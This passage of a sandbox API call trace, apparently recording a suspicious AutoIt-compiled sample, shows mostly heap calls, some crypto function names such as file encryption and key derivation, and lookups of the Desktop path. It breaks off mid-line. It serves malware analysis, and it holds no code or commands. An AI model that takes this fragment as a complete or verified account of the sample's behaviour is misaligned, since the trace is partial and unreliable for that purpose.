[0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a0a8 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79508 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e10 [0251.451] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79508 | out: hHeap=0xc60000) returned 1 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ef60 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79508 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79520 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e20 [0251.451] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79520 | out: hHeap=0xc60000) returned 1 [0251.451] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e20 | out: hHeap=0xc60000) returned 1 [0251.451] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a0d0 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79520 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e20 [0251.451] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79520 | out: hHeap=0xc60000) returned 1 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xd03920 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79520 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79538 [0251.451] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e30 [0251.451] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79538 | out: hHeap=0xc60000) returned 1 [0251.451] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e30 | out: hHeap=0xc60000) returned 1 [0251.452] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a0f8 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79538 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e30 [0251.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79538 | out: hHeap=0xc60000) returned 1 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ef98 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79538 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79550 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e40 [0251.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79550 | out: hHeap=0xc60000) returned 1 [0251.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e40 | out: hHeap=0xc60000) returned 1 [0251.452] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a120 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79550 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e40 [0251.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79550 | out: hHeap=0xc60000) returned 1 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7efd0 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79550 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79568 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e50 [0251.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79568 | out: hHeap=0xc60000) returned 1 [0251.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e50 | out: hHeap=0xc60000) returned 1 [0251.452] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a148 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79568 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e50 [0251.452] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79568 | out: hHeap=0xc60000) returned 1 [0251.452] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7f008 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79568 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79580 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e60 [0251.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79580 | out: hHeap=0xc60000) returned 1 [0251.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e60 | out: hHeap=0xc60000) returned 1 [0251.453] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a170 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79580 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e60 [0251.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79580 | out: hHeap=0xc60000) returned 1 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9ae98 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79580 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79598 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e70 [0251.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79598 | out: hHeap=0xc60000) returned 1 [0251.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e70 | out: hHeap=0xc60000) returned 1 [0251.453] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a198 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79598 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e70 [0251.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79598 | out: hHeap=0xc60000) returned 1 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9aee0 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79598 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795b0 [0251.453] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e80 [0251.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795b0 | out: hHeap=0xc60000) returned 1 [0251.453] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e80 | out: hHeap=0xc60000) returned 1 [0251.453] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a1c0 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795b0 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e80 [0251.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795b0 | out: hHeap=0xc60000) returned 1 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9af28 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795b0 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795c8 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75e90 [0251.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795c8 | out: hHeap=0xc60000) returned 1 [0251.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75e90 | out: hHeap=0xc60000) returned 1 [0251.454] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a1e8 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795c8 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75e90 [0251.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795c8 | out: hHeap=0xc60000) returned 1 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9af70 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795c8 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795e0 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75ea0 [0251.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795e0 | out: hHeap=0xc60000) returned 1 [0251.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75ea0 | out: hHeap=0xc60000) returned 1 [0251.454] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a210 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795e0 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75ea0 [0251.454] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795e0 | out: hHeap=0xc60000) returned 1 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7f040 [0251.454] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795e0 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795f8 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75eb0 [0251.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795f8 | out: hHeap=0xc60000) returned 1 [0251.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75eb0 | out: hHeap=0xc60000) returned 1 [0251.455] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a238 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795f8 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75eb0 [0251.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd795f8 | out: hHeap=0xc60000) returned 1 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xce3728 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd795f8 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79610 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75ec0 [0251.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79610 | out: hHeap=0xc60000) returned 1 [0251.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75ec0 | out: hHeap=0xc60000) returned 1 [0251.455] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a260 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79610 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75ec0 [0251.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79610 | out: hHeap=0xc60000) returned 1 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9afb8 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79610 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79628 [0251.455] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xd75ed0 [0251.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79628 | out: hHeap=0xc60000) returned 1 [0251.455] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75ed0 | out: hHeap=0xc60000) returned 1 [0251.455] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.456] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd6a288 [0251.456] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79628 [0251.456] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0251.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f120 | out: hHeap=0xc60000) returned 1 [0251.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75f30 | out: hHeap=0xc60000) returned 1 [0251.456] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.456] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0251.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f120 | out: hHeap=0xc60000) returned 1 [0251.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75f30 | out: hHeap=0xc60000) returned 1 [0251.456] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.456] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0251.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd6a3c8 | out: hHeap=0xc60000) returned 1 [0251.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75f30 | out: hHeap=0xc60000) returned 1 [0251.456] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.456] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0251.456] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f120 | out: hHeap=0xc60000) returned 1 [0251.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75f30 | out: hHeap=0xc60000) returned 1 [0251.457] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.457] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0251.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.457] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.457] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0251.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.457] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.457] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0251.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9dd30 | out: hHeap=0xc60000) returned 1 [0251.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.457] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.457] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0251.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.457] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.457] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.457] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.458] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.458] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.458] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.458] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.458] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.458] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9b048 | out: hHeap=0xc60000) returned 1 [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.458] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.458] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9dd30 | out: hHeap=0xc60000) returned 1 [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.458] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.458] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.458] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.459] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0251.459] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.459] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.459] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0251.459] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.459] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.459] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.459] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0251.459] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9dd30 | out: hHeap=0xc60000) returned 1 [0251.459] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.459] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.459] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.459] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.459] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0251.459] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.459] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.459] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.460] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0251.460] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7f1c8 | out: hHeap=0xc60000) returned 1 [0251.460] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1788 | out: hHeap=0xc60000) returned 1 [0251.460] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0251.460] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0251.460] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9dd30 | out: hHeap=0xc60000) returned 1 [0251.460] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1798 | out: hHeap=0xc60000) returned 1 [0251.463] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files", lpszShortPath=0x86f70c, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1") returned 0x14 [0251.464] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpszShortPath=0x86f70c, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop") returned 0x19 [0251.465] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)", 